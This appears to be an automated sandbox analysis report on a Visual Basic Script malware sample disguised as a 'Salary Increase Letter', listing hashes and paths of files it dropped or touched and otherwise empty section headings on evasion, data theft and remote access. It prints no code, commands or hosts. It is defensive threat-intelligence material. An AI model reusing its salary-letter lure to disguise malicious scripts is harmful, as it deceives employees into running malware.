Filetype:	Visual Basic Script (13500/0) 100.00%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506	Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression	49AEBF8CBD62D92AC215B2923FB1B9F5	1723BE06719828DDA65AD804298D0431F6AFF976	B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506	data	EF7EF2E42B495CDC20576A3DDC8619E2	6DCA448F9C53409AC98597922F21FB059A830781	1EDD7F7C8A193590D906547C85AD93EEE0220D77E334F0AAB2504D578D1F8164
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q8X2NUFH\json[1].json	JSON data	F61E5CC20FBBA892FF93BFBFC9F41061	36CD25DFAD6D9BC98697518D8C2F5B7E12A5864E	28B330BB74B512AFBD70418465EC04C52450513D3CC8609B08B293DBEC847568
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache	data	106D01F562D751E62B702803895E93E0	CBF19C2392BDFA8C2209F8534616CCA08EE01A92	6DBF75E0DB28A4164DB191AD3FBE37D143521D4D08C6A9CEA4596A2E0988739D
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	data	F93358E626551B46E6ED5A0A9D29BD51	9AECA90CCBFD1BEC2649D66DF8EBE64C13BACF03	0347D1DE5FEA380ADFD61737ECD6068CB69FC466AC9C77F3056275D5FCAFDC0D
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_d1ours4x.ine.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_e2yeomto.dht.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jyddfzdl.pnc.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_metcihpi.1r0.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Roaming\Foregrib.ses	ASCII text, with very long lines (65536), with no line terminators	3D3DBB0E90C5B97B9B63BE3573337577	73373EF708B2A92FA3A66FBE7CA1D8D1892917A6	67028F4A738865DBBD967FC48EED2B3E044A284EAFF234BD79BF86E3ABBFA74D

Windows Analysis Report Salary Increase Letter_Oct 2024.vbs

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel Provided by

Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

E-Banking Fraud

DDoS

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report
Salary Increase Letter_Oct 2024.vbs

Malware Threat Intel
Provided by